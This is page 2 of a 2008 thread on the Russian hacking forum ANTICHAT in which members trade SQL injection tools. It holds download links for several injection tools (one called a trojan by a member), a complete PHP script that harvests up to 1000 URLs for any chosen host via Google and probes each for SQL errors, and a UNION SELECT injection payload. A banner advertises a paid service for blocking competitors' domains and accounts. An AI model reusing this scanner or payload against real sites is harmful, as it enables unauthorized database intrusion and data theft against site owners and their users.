УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Injection Tools

Страница 2 из 3

Опции темы

Поиск в этой теме

Опции просмотра

Microsoft SQL Database Extractor

#11

05.09.2008, 19:20

~~baltazar~~

Banned

Регистрация: 30.03.2007

Сообщений: 344

Провел на форуме:
5149122

Репутация: 2438

Отправить сообщение для baltazar с помощью ICQ

Microsoft SQL Database Extractor

Скачать!

#12

05.09.2008, 19:47

DimOnOID

Постоянный

Регистрация: 05.12.2006

Сообщений: 477

Провел на форуме:
11338585

Репутация: 441

Отправить сообщение для DimOnOID с помощью ICQ

Спосибо за трояна!
SQL Helper 1.0
http://www.virustotal.com/ru/analisis/2dafc9437e19435ce04a1d086091c9a6

SQL Helper v 2.0

#13

05.09.2008, 23:06

Fugitif

Постоянный

Регистрация: 23.09.2007

Сообщений: 416

Провел на форуме:
1781065

Репутация: 869

SQL Helper v 2.0

VirusTotal analyse:

http://www.virustotal.com/analisis/f...0e129ba9358c84

Download:

http://rapidshare.com/files/142900562/IHv2.rar.html

#14

08.09.2008, 04:50

warlok

Постоянный

Регистрация: 18.02.2008

Сообщений: 368

Провел на форуме:
4075418

Репутация: 386

Код:

<?php
set_time_limit(0);
function google($domen){
$file=file_get_contents("http://www.google.ru/ie?q=site%3A$domen&hl=ru&newwindow=1&btnG=%D0%9F%D0%BE%D0%B8%D1%81%D0%BA&num=100");
//$file=file_get_contents("http://www.google.ru/ie?q=".urlencode(trim($text))."&hl=ru&lr=&newwindow=1&btnI=I%27m+Feeling+Lucky&num=10000");
$result = array ();
$ex = array ();
$regexp = '[0-9]. <a title="(.*)" href=(.*)>(.*)<\/a>';

if (preg_match_all("/$regexp/siU", $file, $matches)) {
foreach($matches[2] as $item) { 
array_push($result,$item);
}

if (is_integer(strpos($file,"&start="))) { // От 0 до 100
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=100&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 100 до 200
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=200&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 200 до 300
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=300&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 300 до 400
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=400&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 400 до 500
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=500&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 500 до 600
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=600&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 600 до 700
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=700&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 700 до 800
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=800&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=900&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}
if (is_integer(strpos($file,"&start="))) { // От 800 до 900
$file=file_get_contents("http://www.google.ru/ie?q=site:$domen&num=1000&hl=ru&start=100&sa=N");
if (preg_match_all("/$regexp/siU", $file, $matches)) {foreach($matches[2] as $item) { array_push($result,$item);}}}

for ($i = 0; $i <= count($result)-1; $i++) {
if (is_integer(strpos($result[$i],"="))) {
$s=$result[$i];
$s=str_replace("&","'&",$s);
$s = $s."'";
$rx=file_get_contents($s);
if (is_integer(strpos($rx,"SQL syntax"))){
flush();
echo "<span class=\"red\">$s</span><br>";}
}}

if(count($ex)==0)
array_push($ex,"<center><b>Not found</b></center>");

return $ex;
} else return "<center><b>Not found</b></center>";
}
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>SQL Inj Tester - Coded by ArxWolf, Powered by WebXakep.net - Russian</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<meta name="author" content="ArxWolf">
<style>
.red:link	{ color: red; font-weight: bold; text-decoration: none;}
.red:visited	{ color: red; font-weight: bold; text-decoration: none;}
.red:hover	{ color: red; font-weight: bold; text-decoration: underline;}
.red:active	{ color: red; font-weight: bold; text-decoration: none;}
body {
background-color: #1B1B1B;
font: normal 10px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #83AACB;
font-weight: bold;
}
input,textarea,select
{font: normal 11px verdana, geneva, lucida, 'lucida grande', arial, helvetica, sans-serif;
color: #B4B4B4;
background-color: #333333;
border-color: #424242;
border-left: 1px solid #0A0A0A;
border-top: 1px solid #0A0A0A;
border-right: 1px solid #2C2C2C;
border-bottom: 1px solid #2C2C2C;}
input:hover, textarea:hover, select:hover  {
border-color: #B6FF48;
color: #B6FF48;}
input:focus, textarea:focus, select:hover {
border-color: #B6FF48;
color: #ffffff;}
.td {
	border: 1px solid #666666;
}
</style>
</head>
<body>
<form method="post">
<table width="200"  border="0" align="center" class="td">
  <tr>
    <td nowrap>Host [Scanning a maximum of 1000 pages]:</td>
    <td><input type="text" name="tt" size="30"></td>
  </tr>
  <tr>
    <td colspan="2"><div align="right">
      <input type="submit" name="sbm" value="Run">
    </div></td>
  </tr>
</table>
</form>

<?php
if (isset($_POST['sbm'])){
$txt=$_POST['tt'];
if ($txt=="") die("<center><b>Empty</b></center>");
$res=google($txt);

}
?>

</body>
</html>

#15

08.09.2008, 05:05

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

перезалейте SQL и XSS error error

#16

10.09.2008, 17:44

GlobalRave

Новичок

Регистрация: 04.05.2008

Сообщений: 6

Провел на форуме:
30895

Репутация: 8

Microsoft SQL Database Extractor Как в этой проге обозначить место с инъекцией?
Она такого плана 9999999+union+select+0,1,2,3,4,5,6,@@version+--

#17

14.09.2008, 23:26

~~F1shka~~

Banned

Регистрация: 10.04.2008

Сообщений: 618

Провел на форуме:
2603997

Репутация: 942

Отправить сообщение для F1shka с помощью ICQ

Отправить сообщение для F1shka с помощью AIM

Отправить сообщение для F1shka с помощью Yahoo

Я не Славик и не Димон, но я тчто то очкую качать.....

#18

15.09.2008, 08:50

~~guest3297~~

Banned

Регистрация: 27.06.2006

Сообщений: 1,614

Провел на форуме:
3887520

Репутация: 2996

Цитата:

перезалейте SQL и XSS error finder

#19

15.09.2008, 11:42

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ

лови [ cash ] _http://rapidshare.com/files/17218785/937_SXF.rar.html

#20

20.09.2008, 23:09

~~~!DoK_tOR!~~~

Banned

Регистрация: 10.11.2006

Сообщений: 829

Провел на форуме:
2634544

Репутация: 1559

ISR-sqlget v.1.0.0

Description: ISR-sqlget: It's a blind SQL injection tool developed in Perl.
It lets you get databases schemas and tables rows.
Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

DATABASES SUPPORTED:

Код:

- IBM DB2
- Mcft SQL SERVER
- ORACLE
- POSTGRES
- MYSQL
- IBM INFORMIX
- SYBASE
- HSQLDB
- MIMER
- PERVASIVE
- VIRTUOSO
- SQLITE
- INTERBASE/YAFFIL/FIREBIRD
- H2 
- MCKOI
- INGRES
- MONETDB 
- MAXDB 
- THINKSQL 
- SQLBASE

Если не будет работать ошибка будет примерно такого вида:

Код:

Can't locate Convert/EastAsianWidth.pm in @INC (@INC contains: ./libs/ D:/Perl/site/lib D:/Perl/lib .) at connection.pm line 6
BEGIN failed--compilation aborted at connection.pm line 6.
Compilation failed in require at ISR-sqlget.pl line 30.
BEGIN failed--compilation aborted at ISR-sqlget.pl line 30.

скачиваем http://search.cpan.org/src/AUTRIJUS/Unicode-EastAsianWidth-1.02/lib/Unicode/EastAsianWidth.pm и вставляем его в папку D:\Perl\lib\Convert если папки Convert нет то создаём )

Download: _http://www.infobyte.com.ar/down/ISR-sqlget-1.0.0.tar.gz

Последний раз редактировалось ~!DoK_tOR!~; 20.09.2008 в 23:56..

Страница 2 из 3

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
SQL Injection FAQ	bx_N	Forum for discussion of ANTICHAT	2	08.03.2007 18:48
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход